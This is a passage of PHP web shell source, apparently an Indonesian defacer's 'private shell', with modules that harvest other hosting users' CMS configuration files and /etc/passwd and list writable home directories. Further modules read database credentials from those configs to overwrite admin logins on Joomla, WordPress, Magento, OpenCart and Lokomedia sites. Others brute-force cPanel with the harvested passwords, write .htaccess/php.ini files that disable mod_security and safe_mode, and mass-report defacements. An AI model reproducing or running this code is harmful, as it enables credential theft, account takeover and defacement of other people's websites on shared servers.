  2434.                     "/home3/$user_os/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2435.                     "/home3/$user_os/public_html/blog/configuration.php" => "JoomlaBlog",
  2436.                     "/home3/$user_os/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2437.                     "/home3/$user_os/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2438.                     "/home3/$user_os/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2439.                     "/home3/$user_os/public_html/beta/configuration.php" => "JoomlaBeta",
  2440.                     "/home3/$user_os/public_html/Beta/configuration.php" => "JoomlaBeta",
  2441.                     "/home3/$user_os/public_html/BETA/configuration.php" => "JoomlaBeta",
  2442.                     "/home3/$user_os/public_html/PRESS/configuration.php" => "JoomlaPress",
  2443.                     "/home3/$user_os/public_html/Press/configuration.php" => "JoomlaPress",
  2444.                     "/home3/$user_os/public_html/press/configuration.php" => "JoomlaPress",
  2445.                     "/home3/$user_os/public_html/Wp/configuration.php" => "JoomlaWp",
  2446.                     "/home3/$user_os/public_html/wp/configuration.php" => "JoomlaWp",
  2447.                     "/home3/$user_os/public_html/WP/configuration.php" => "JoomlaWP",
  2448.                     "/home3/$user_os/public_html/portal/configuration.php" => "JoomlaPortal",
  2449.                     "/home3/$user_os/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2450.                     "/home3/$user_os/public_html/Portal/configuration.php" => "JoomlaPortal",                
  2451.                     "/home3/$user_os/public_html/wp-config.php" => "WordPress",
  2452.                     "/home3/$user_os/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2453.                     "/home3/$user_os/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2454.                     "/home3/$user_os/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",        
  2455.                     "/home3/$user_os/public_html/Home/wp-config.php" => "WordPressHome",
  2456.                     "/home3/$user_os/public_html/HOME/wp-config.php" => "WordPressHome",
  2457.                     "/home3/$user_os/public_html/home/wp-config.php" => "WordPressHome",
  2458.                     "/home3/$user_os/public_html/NEW/wp-config.php" => "WordPressNew",
  2459.                     "/home3/$user_os/public_html/New/wp-config.php" => "WordPressNew",
  2460.                     "/home3/$user_os/public_html/new/wp-config.php" => "WordPressNew",
  2461.                     "/home3/$user_os/public_html/News/wp-config.php" => "WordPressNews",
  2462.                     "/home3/$user_os/public_html/NEWS/wp-config.php" => "WordPressNews",
  2463.                     "/home3/$user_os/public_html/news/wp-config.php" => "WordPressNews",
  2464.                     "/home3/$user_os/public_html/Cms/wp-config.php" => "WordPressCms",
  2465.                     "/home3/$user_os/public_html/CMS/wp-config.php" => "WordPressCms",
  2466.                     "/home3/$user_os/public_html/cms/wp-config.php" => "WordPressCms",
  2467.                     "/home3/$user_os/public_html/Main/wp-config.php" => "WordPressMain",
  2468.                     "/home3/$user_os/public_html/MAIN/wp-config.php" => "WordPressMain",
  2469.                     "/home3/$user_os/public_html/main/wp-config.php" => "WordPressMain",
  2470.                     "/home3/$user_os/public_html/Blog/wp-config.php" => "WordPressBlog",
  2471.                     "/home3/$user_os/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2472.                     "/home3/$user_os/public_html/blog/wp-config.php" => "WordPressBlog",
  2473.                     "/home3/$user_os/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2474.                     "/home3/$user_os/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2475.                     "/home3/$user_os/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2476.                     "/home3/$user_os/public_html/beta/wp-config.php" => "WordPressBeta",
  2477.                     "/home3/$user_os/public_html/Beta/wp-config.php" => "WordPressBeta",
  2478.                     "/home3/$user_os/public_html/BETA/wp-config.php" => "WordPressBeta",
  2479.                     "/home3/$user_os/public_html/PRESS/wp-config.php" => "WordPressPress",
  2480.                     "/home3/$user_os/public_html/Press/wp-config.php" => "WordPressPress",
  2481.                     "/home3/$user_os/public_html/press/wp-config.php" => "WordPressPress",
  2482.                     "/home3/$user_os/public_html/Wp/wp-config.php" => "WordPressWp",
  2483.                     "/home3/$user_os/public_html/wp/wp-config.php" => "WordPressWp",
  2484.                     "/home3/$user_os/public_html/WP/wp-config.php" => "WordPressWP",
  2485.                     "/home3/$user_os/public_html/portal/wp-config.php" => "WordPressPortal",
  2486.                     "/home3/$user_os/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2487.                     "/home3/$user_os/public_html/Portal/wp-config.php" => "WordPressPortal"                  
  2488.                         );  
  2489.                     foreach($grab_config as $config => $nama_config) {
  2490.                         $ambil_config = file_get_contents($config);
  2491.                         if($ambil_config == '') {
  2492.                         } else {
  2493.                             $file_config = fopen("os_config/$user_os-$nama_config.txt","w");
  2494.                             fputs($file_config,$ambil_config);
  2495.                         }
  2496.                     }
  2497.                 }      
  2498.             }
  2499.             echo "<center><a href='?dir=$dir/os_config'><font color=white>Selese Cok!</font></a></center>";
  2500.             }else{
  2501.                
  2502.         echo "<div class='mybox'><form method=\"post\" action=\"\"><center><h1>Config Grabber</h1><hr color='white'><br>etc/passw ( Error ? <a href='?dir=$dir&666=passwbypass'>Bypass di sini!</a> )<br><br><textarea name=\"passwd\" class='area' style='border-color=white;' rows='15' cols='60'>\n";
  2503.         echo file_get_contents('/etc/passwd');
  2504.         echo "</textarea><br><br><input type=\"submit\"  style='border-color:white; text-align:center' class='kotak' value=\"SIKAT!\"></td></tr></center></div>\n";
  2505.         }
  2506. } elseif($_GET['666'] == 'lompat_indah') {
  2507.     $i = 0;
  2508.     echo "<pre><div class='margin: 5px auto; mybox'><h1>Lompat Indah [Jumping Server]</h1>";
  2509.     $etc = fopen("/etc/passwd", "r");
  2510.     while($passwd = fgets($etc)) {
  2511.         if($passwd == '' || !$etc) {
  2512.             echo "<font color=red>Can't read /etc/passwd</font>";
  2513.         } else {
  2514.             preg_match_all('/(.*?):x:/', $passwd, $user_lompat_indah);
  2515.             foreach($user_lompat_indah[1] as $user_os_jump) {
  2516.                 $user_lompat_indah_dir = "/home/$user_os_jump/public_html";
  2517.                 if(is_readable($user_lompat_indah_dir)) {
  2518.                     $i++;
  2519.                     $jrw = "[<font color=white>R</font>] <a href='?dir=$user_lompat_indah_dir'><font color=white>$user_lompat_indah_dir</font></a><br>";
  2520.                     if(is_writable($user_lompat_indah_dir)) {
  2521.                         $jrw = "[<font color=white>RW</font>] <a href='?dir=$user_lompat_indah_dir'><font color=white>$user_lompat_indah_dir</font></a><br>";
  2522.                     }
  2523.                     echo $jrw;
  2524.                     $domain_jump = file_get_contents("/etc/named.conf");    
  2525.                     if($domain_jump == '') {
  2526.                         echo " => ( <font color=red>gabisa ambil nama domain nya cok !!</font> )<br>";
  2527.                     } else {
  2528.                         preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  2529.                         foreach($domains_jump[1] as $dj) {
  2530.                             $user_lompat_indah_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  2531.                             $user_lompat_indah_url = $user_lompat_indah_url['name'];
  2532.                             if($user_lompat_indah_url == $user_os_jump) {
  2533.                                 echo " => ( <u>$dj</u> )<br>";
  2534.                                 break;
  2535.                             }
  2536.                         }
  2537.                     }
  2538.                 }
  2539.             }
  2540.         }
  2541.     }
  2542.     if($i == 0) {
  2543.     } else {
  2544.         echo "<br>Total ada ".$i." Bangsat di ".gethostbyname($_SERVER['HTTP_HOST'])."";
  2545.     }
  2546.     echo "</div></pre>";
  2547. } elseif($_GET['666'] == 'auto_edit_user') {
  2548.     if($_POST['sikat']) {
  2549.         if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  2550.             echo "username atau password harus lebih dari 6 karakter";
  2551.         } else {
  2552.             $user_baru = $_POST['user_baru'];
  2553.             $pass_baru = md5($_POST['pass_baru']);
  2554.             $conf = $_POST['config_dir'];
  2555.             $scan_conf = scandir($conf);
  2556.             foreach($scan_conf as $file_conf) {
  2557.                 if(!is_file("$conf/$file_conf")) continue;
  2558.                 $config = file_get_contents("$conf/$file_conf");
  2559.                 if(preg_match("/JConfig|joomla/",$config)) {
  2560.                     $dbhost = ambilkata($config,"host = '","'");
  2561.                     $dbuser = ambilkata($config,"user = '","'");
  2562.                     $dbpass = ambilkata($config,"password = '","'");
  2563.                     $dbname = ambilkata($config,"db = '","'");
  2564.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
  2565.                     $prefix = $dbprefix."users";
  2566.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2567.                     $db = mysql_select_db($dbname);
  2568.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2569.                     $result = mysql_fetch_array($q);
  2570.                     $id = $result['id'];
  2571.                     $site = ambilkata($config,"sitename = '","'");
  2572.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  2573.                     echo "Config => ".$file_conf."<br>";
  2574.                     echo "CMS => Joomla<br>";
  2575.                     if($site == '') {
  2576.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya cok !!</font><br>";
  2577.                     } else {
  2578.                         echo "Sitename => $site<br>";
  2579.                     }
  2580.                     if(!$update OR !$conn OR !$db) {
  2581.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2582.                     } else {
  2583.                         echo "Status => <font color=white>sukses edit user cok, sana login pake user & pass baru.</font><br><br>";
  2584.                     }
  2585.                     mysql_close($conn);
  2586.                 } elseif(preg_match("/WordPress/",$config)) {
  2587.                     $dbhost = ambilkata($config,"DB_HOST', '","'");
  2588.                     $dbuser = ambilkata($config,"DB_USER', '","'");
  2589.                     $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2590.                     $dbname = ambilkata($config,"DB_NAME', '","'");
  2591.                     $dbprefix = ambilkata($config,"table_prefix  = '","'");
  2592.                     $prefix = $dbprefix."users";
  2593.                     $option = $dbprefix."options";
  2594.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2595.                     $db = mysql_select_db($dbname);
  2596.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2597.                     $result = mysql_fetch_array($q);
  2598.                     $id = $result[ID];
  2599.                     $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2600.                     $result2 = mysql_fetch_array($q2);
  2601.                     $target = $result2[option_value];
  2602.                     if($target == '') {
  2603.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa cok !!</font><br>";
  2604.                     } else {
  2605.                         $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  2606.                     }
  2607.                     $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  2608.                     echo "Config => ".$file_conf."<br>";
  2609.                     echo "CMS => Wordpress<br>";
  2610.                     echo $url_target;
  2611.                     if(!$update OR !$conn OR !$db) {
  2612.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2613.                     } else {
  2614.                         echo "Status => <font color=white>sukses edit user cok, sana login pake user & pass baru.</font><br><br>";
  2615.                     }
  2616.                     mysql_close($conn);
  2617.                 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  2618.                     $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  2619.                     $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  2620.                     $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  2621.                     $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  2622.                     $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  2623.                     $prefix = $dbprefix."admin_user";
  2624.                     $option = $dbprefix."core_config_data";
  2625.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2626.                     $db = mysql_select_db($dbname);
  2627.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  2628.                     $result = mysql_fetch_array($q);
  2629.                     $id = $result[user_id];
  2630.                     $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  2631.                     $result2 = mysql_fetch_array($q2);
  2632.                     $target = $result2[value];
  2633.                     if($target == '') {
  2634.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa cok !!</font><br>";
  2635.                     } else {
  2636.                         $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  2637.                     }
  2638.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  2639.                     echo "Config => ".$file_conf."<br>";
  2640.                     echo "CMS => Magento<br>";
  2641.                     echo $url_target;
  2642.                     if(!$update OR !$conn OR !$db) {
  2643.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2644.                     } else {
  2645.                         echo "Status => <font color=white>sukses edit user cok, silakan login dengan user & pass yang baru.</font><br><br>";
  2646.                     }
  2647.                     mysql_close($conn);
  2648.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  2649.                     $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  2650.                     $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  2651.                     $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  2652.                     $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  2653.                     $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  2654.                     $prefix = $dbprefix."user";
  2655.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2656.                     $db = mysql_select_db($dbname);
  2657.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  2658.                     $result = mysql_fetch_array($q);
  2659.                     $id = $result[user_id];
  2660.                     $target = ambilkata($config,"HTTP_SERVER', '","'");
  2661.                     if($target == '') {
  2662.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa cok !!</font><br>";
  2663.                     } else {
  2664.                         $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  2665.                     }
  2666.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  2667.                     echo "Config => ".$file_conf."<br>";
  2668.                     echo "CMS => OpenCart<br>";
  2669.                     echo $url_target;
  2670.                     if(!$update OR !$conn OR !$db) {
  2671.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2672.                     } else {
  2673.                         echo "Status => <font color=white>sukses edit user cok, sana login pake user & pass yang baru.</font><br><br>";
  2674.                     }
  2675.                     mysql_close($conn);
  2676.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  2677.                     $dbhost = ambilkata($config,'server = "','"');
  2678.                     $dbuser = ambilkata($config,'username = "','"');
  2679.                     $dbpass = ambilkata($config,'password = "','"');
  2680.                     $dbname = ambilkata($config,'database = "','"');
  2681.                     $prefix = "users";
  2682.                     $option = "identitas";
  2683.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2684.                     $db = mysql_select_db($dbname);
  2685.                     $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  2686.                     $result = mysql_fetch_array($q);
  2687.                     $target = $result[alamat_website];
  2688.                     if($target == '') {
  2689.                         $target2 = $result[url];
  2690.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa cok !!</font><br>";
  2691.                         if($target2 == '') {
  2692.                             $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa cok !!</font><br>";
  2693.                         } else {
  2694.                             $cek_login3 = file_get_contents("$target2/adminweb/");
  2695.                             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  2696.                             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  2697.                                 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  2698.                             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  2699.                                 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  2700.                             } else {
  2701.                                 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  2702.                             }
  2703.                         }
  2704.                     } else {
  2705.                         $cek_login = file_get_contents("$target/adminweb/");
  2706.                         $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  2707.                         if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  2708.                             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  2709.                         } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  2710.                             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  2711.                         } else {
  2712.                             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  2713.                         }
  2714.                     }
  2715.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  2716.                     echo "Config => ".$file_conf."<br>";
  2717.                     echo "CMS => Lokomedia<br>";
  2718.                     if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  2719.                         echo $url_target2;
  2720.                     } else {
  2721.                         echo $url_target;
  2722.                     }
  2723.                     if(!$update OR !$conn OR !$db) {
  2724.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2725.                     } else {
  2726.                         echo "Status => <font color=white>sukses edit user CoK, sana login pake user & pass baru.</font><br><br>";
  2727.                     }
  2728.                     mysql_close($conn);
  2729.                 }
  2730.             }
  2731.         }
  2732.     } else {
  2733.         echo "<div style='text-align:left' class='mybox'>
  2734.         <h1>Auto Edit User Config</h1><hr color='white'>
  2735.         <form method='post'>
  2736.         DIR Config:&nbsp&nbsp&nbsp&nbsp&nbsp
  2737.         <input type='text' style='border:0;border-bottom:1px solid #292929; width:500px;' name='config_dir' value='$dir'><br><br>
  2738.         Set User & Pass:
  2739.         <input type='text' style='border:0;border-bottom:1px solid #292929; width:500px;' name='user_baru' value='cyberscry' placeholder='user_baru'><br>
  2740.         &nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp
  2741.         <input type='text' style='border:0;border-bottom:1px solid #292929; width:500px;' name='pass_baru' value='cyberscry' placeholder='pass_baru'><br><br>
  2742.         &nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp
  2743.         <input type='submit' style='width: 50px; height: 30px; border-color=white;margin:10px 2px 0 2px;' name='sikat' class='kotak' value='SIKAT!'>
  2744.         </form>
  2745.         <span>
  2746.         NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/berandal_config )</span></div>
  2747.         ";
  2748.     }
  2749. }elseif($_GET['666'] == 'jguide') {
  2750.     echo "<div class='mybox' style='text-align:left'><h1>JonesGuide Mass Poster</h1><hr color='white'>
  2751.         <form method='post'>
  2752.         Defacer
  2753.         <input type='text' style='border:0;border-bottom:1px solid #292929; width:500px;' name='hekel' placeholder='Berandal'><br><br>
  2754.         Team
  2755.         &nbsp&nbsp&nbsp<input type='text' style='border:0;border-bottom:1px solid #292929; width:500px;' name='tim' placeholder='CYBERSCRYTECH_'><br><br>
  2756.         Domains: <br>
  2757.         <textarea class='mybox' style='border-color:#292929' rows='10' name='sites'></textarea><br>
  2758.         <input type='submit' style='width: 50px; height: 30px; border-color=white;margin:10px 2px 0 2px;' name='sikat' value='Submit' class='kotak'>
  2759.         </form></div>";
  2760. $site = explode("\r\n", $_POST['sites']);
  2761. $go = $_POST['sikat'];
  2762. $hekel = $_POST['hekel'];
  2763. $tim = $_POST['tim'];
  2764. if($go) {
  2765. foreach($site as $sites) {
  2766. $zh = $sites;
  2767. $form_url = "https://www.jonesguide/notify.html";
  2768. $data_to_post = array();
  2769. $data_to_post['attacker'] = "$hekel";
  2770. $data_to_post['team'] = "$tim";
  2771. $data_to_post['poc'] = 'SQL Injection';
  2772. $data_to_post['url'] = "$zh";
  2773. $curl = curl_init();
  2774. curl_setopt($curl,CURLOPT_URL, $form_url);
  2775. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
  2776. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
  2777. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
  2778. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  2779. curl_setopt($curl, CURLOPT_REFERER, 'https://jonesguide.com/notify.html');
  2780. $result = curl_exec($curl);
  2781. echo $result;
  2782. curl_close($curl);
  2783. echo "<br>";
  2784. }
  2785. }
  2786. }
  2787.  elseif($_GET['666'] == 'cpanel') {
  2788.     if($_POST['crack']) {
  2789.         $usercp = explode("\r\n", $_POST['user_cp']);
  2790.         $passcp = explode("\r\n", $_POST['pass_cp']);
  2791.         $i = 0;
  2792.         foreach($usercp as $ucp) {
  2793.             foreach($passcp as $pcp) {
  2794.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  2795.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  2796.                     } else {
  2797.                         $_SESSION[$ucp] = "1";
  2798.                         $_SESSION[$pcp] = "1";
  2799.                         $i++;
  2800.                         echo "username (<font color=white>$ucp</font>) password (<font color=white>$pcp</font>)<br>";
  2801.                     }
  2802.                 }
  2803.             }
  2804.         }
  2805.         if($i == 0) {
  2806.         } else {
  2807.             echo "<br>Sukses nyolong ".$i." Cpanel by <font color=white>./Mr.HTTP Private Shell</font>";
  2808.         }
  2809.     } else {
  2810.         echo "<center class='mybox'><h1>Cpanel Cracker</h1><hr color='white'>
  2811.         <form method='post'>
  2812.         USER: <br>
  2813.         <textarea style='width: 450px; height: 150px; border-color=white' name='user_cp'>";
  2814.         $_usercp = fopen("/etc/passwd","r");
  2815.         while($getu = fgets($_usercp)) {
  2816.             if($getu == '' || !$_usercp) {
  2817.                 echo "<font color=red>Can't read /etc/passwd</font>";
  2818.             } else {
  2819.                 preg_match_all("/(.*?):x:/", $getu, $u);
  2820.                 foreach($u[1] as $user_cp) {
  2821.                         if(is_dir("/home/$user_cp/public_html")) {
  2822.                             echo "$user_cp\n";
  2823.                     }
  2824.                 }
  2825.             }
  2826.         }
  2827.         echo "</textarea><br>
  2828.         PASS: <br>
  2829.         <textarea style='width: 450px; height: 200px; border-color=white' name='pass_cp'>";
  2830.         function cp_pass($dir) {
  2831.             $pass = "";
  2832.             $dira = scandir($dir);
  2833.             foreach($dira as $dirb) {
  2834.                 if(!is_file("$dir/$dirb")) continue;
  2835.                 $ambil = file_get_contents("$dir/$dirb");
  2836.                 if(preg_match("/WordPress/", $ambil)) {
  2837.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  2838.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  2839.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
  2840.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  2841.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  2842.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  2843.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
  2844.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  2845.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  2846.                 } elseif(preg_match("/client/", $ambil)) {
  2847.                     preg_match("/password=(.*)/", $ambil, $pass1);
  2848.                     if(preg_match('/"/', $pass1[1])) {
  2849.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  2850.                         $pass .= $pass1[1]."\n";
  2851.                     }
  2852.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  2853.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  2854.                 }
  2855.             }
  2856.             echo $pass;
  2857.         }
  2858.         $cp_pass = cp_pass($dir);
  2859.         echo $cp_pass;
  2860.         echo "</textarea><br>
  2861.         <input type='submit' name='crack' style='width: 450px; border-color=white' class='kotak' value='Crack'>
  2862.         </form>
  2863.         <span>NB: CPanel Crack ini udah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/os_config )</span><br></center>";
  2864.     }
  2865. }
  2866. elseif($_GET['666'] == 'sec') {
  2867. echo '<h1>Safe Mode</h1>';
  2868.     echo '<div class="content">';
  2869.     echo "<div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh  ] files create in following dir<br>| ".$GLOBALS['cwd']." |<br><br />";
  2870.     echo '<a href=? onclick="g(null,null,\'php.ini\',null)">| PHP.INI | </a><a href=? onclick="g(null,null,null,\'ini\')">| .htaccess(Mod) | </a><a href=? onclick="g(null,null,null,null,\'sh\')">| .htaccess(perl) | </a></center><br>';
  2871.     if(!empty($_POST['p2']) && isset($_POST['p2']))
  2872.     {
  2873.         $fil=fopen($GLOBALS['cwd'].".htaccess","w");
  2874.         fwrite($fil,'<IfModule mod_security.c>
  2875.             Sec------Engine Off
  2876.             Sec------ScanPOST Off
  2877.             </IfModule>');
  2878.         fclose($fil);
  2879.    }
  2880.    if(!empty($_POST['p1'])&& isset($_POST['p1']))
  2881.    {
  2882.         $fil=fopen($GLOBALS['cwd']."php.ini","w");
  2883.         fwrite($fil,'safe_mode=OFF
  2884.             disable_functions=NONE');
  2885.         fclose($fil);
  2886.     }
  2887.     if(!empty($_POST['p3']) && isset($_POST['p3']))
  2888.     {
  2889.         $fil=fopen($GLOBALS['cwd'].".htaccess","w");
  2890.         fwrite($fil,'Options FollowSymLinks MultiViews Indexes ExecCGI
  2891.         AddType application/x-httpd-cgi .sh
  2892.         AddHandler cgi-script .pl
  2893.         AddHandler cgi-script .pl');
  2894.         fclose($fil);
  2895.     }
  2896.     echo "</div>";
  2897.     echo '</div>';
  2898. }
  2899.  elseif($_GET['666'] == 'loghunter')
  2900.     {
  2901. echo '<center class="mybox"><h1>Log Hunter</h1>';    
  2902. echo "<hr color='white'>";
  2903. echo "<form action=\"\" method=\"post\">\n";
  2904. ?><br>Dir :<input type="text" value="<?=getcwd();?>" style='border-color=white;' name="shc_dir"><?php
  2905. echo "<input type=\"submit\"  style='border-color=white;' name=\"submit\" class=\"kotak\" value=\"Scan!\"/>\n";
  2906. echo "</form>\n";
  2907. echo "<pre style=\"text-align: left;\">\n";
  2908. error_reporting(0);
  2909. /*
  2910. +--------------------------------------------+
  2911. Name    : Log Hunter (Grab Email)
  2912. Date    : 26/03/2016 05:53 PM
  2913. Link    : http://facebook.com/bug7sec
  2914. Link    : http://pastebin.com/u/shor7cut
  2915. Author  : Shor7cut
  2916. +--------------------------------------------+
  2917. Recoder : Berandal
  2918. Link    : http://twitter.com/id_berandal
  2919. Link    : http://pastebin.com/u/berandal666
  2920. +--------------------------------------------+
  2921. */
  2922.  
  2923.  
  2924. if($_POST['submit']){
  2925. function tampilkan($shcdirs){
  2926. foreach(scandir($shcdirs) as $shc)
  2927.     {
  2928.         if($shc!='.' && $shc!='..')
  2929.         {
  2930.             $shc = $shcdirs.DIRECTORY_SEPARATOR.$shc;
  2931.             if( !is_dir($shc) && !eregi("css", $shc) ){
  2932.  
  2933.                 $fgt    = file_get_contents($shc);
  2934.                 $ifgt   = exif_read_data($shc);
  2935.                 $jembut = "COMPUTED";
  2936.                 $taik   = "UserComment";
  2937.                 $shcm = "/mail['(']/";
  2938.                 if($ifgt[$jembut][$taik]){
  2939.                     echo "[<font color=#00FFD0>Stegano</font>] <font color=#2196F3>".$shc."</font><br>";
  2940.                 }
  2941.                 preg_match_all('#[A-Z0-9a-z._%+-]+@[A-Za-z0-9.+-]+#',$fgt,$cocok);
  2942.                 $hcs  = "/base64_decode/";
  2943.                 $exif = "/exif_read_data/";
  2944.                 preg_match($shcm, addslashes($fgt), $mailshc);
  2945.                 preg_match($hcs,  addslashes($fgt), $shcmar);
  2946.                 preg_match($exif, addslashes($fgt), $shcxif);
  2947.                 if(eregi('HTTP Cookie File', $fgt) || eregi('PHP Warning:', $fgt) ){
  2948.                 }
  2949.                 if(eregi('tmp_name', $fgt)){
  2950.                     echo "[<font color=#FAFF14>Uploader</font>] <font color=#2196F3>".$shc."</font><br>";
  2951.                 }
  2952.                 if($shcmar[0]){
  2953.                     echo "[<font color=#FF3D00>Base64</font>] <font color=#2196F3>".$shc."</font><br>";
  2954.                 }
  2955.                 if($mailshc[0]){
  2956.                     echo "[<font color=#E6004E>MailFunc</font>] <font color=#2196F3>".$shc."</font><br>";
  2957.                 }
  2958.                 if($shcxif[0]){
  2959.                     echo "[<font color=#00FFD0>Stegano</font>] <font color=#2196F3>".$shc."</font> </font><font color=red>{Manual Check}</font><br>";
  2960.                 }
  2961.                 if(eregi("js", $shc)){
  2962.                             echo "[<font color=red>Javascript</font>] <font color=#2196F3>".$shc."</font> { <a href=http://www.unphp.net target=_blank>CheckJS</a> }<br>";
  2963.                 }
  2964.                 if($cocok[0]){
  2965.                     foreach ($cocok[0] as $key => $shcmail) {
  2966.                         if (filter_var($shcmail, FILTER_VALIDATE_EMAIL)) {
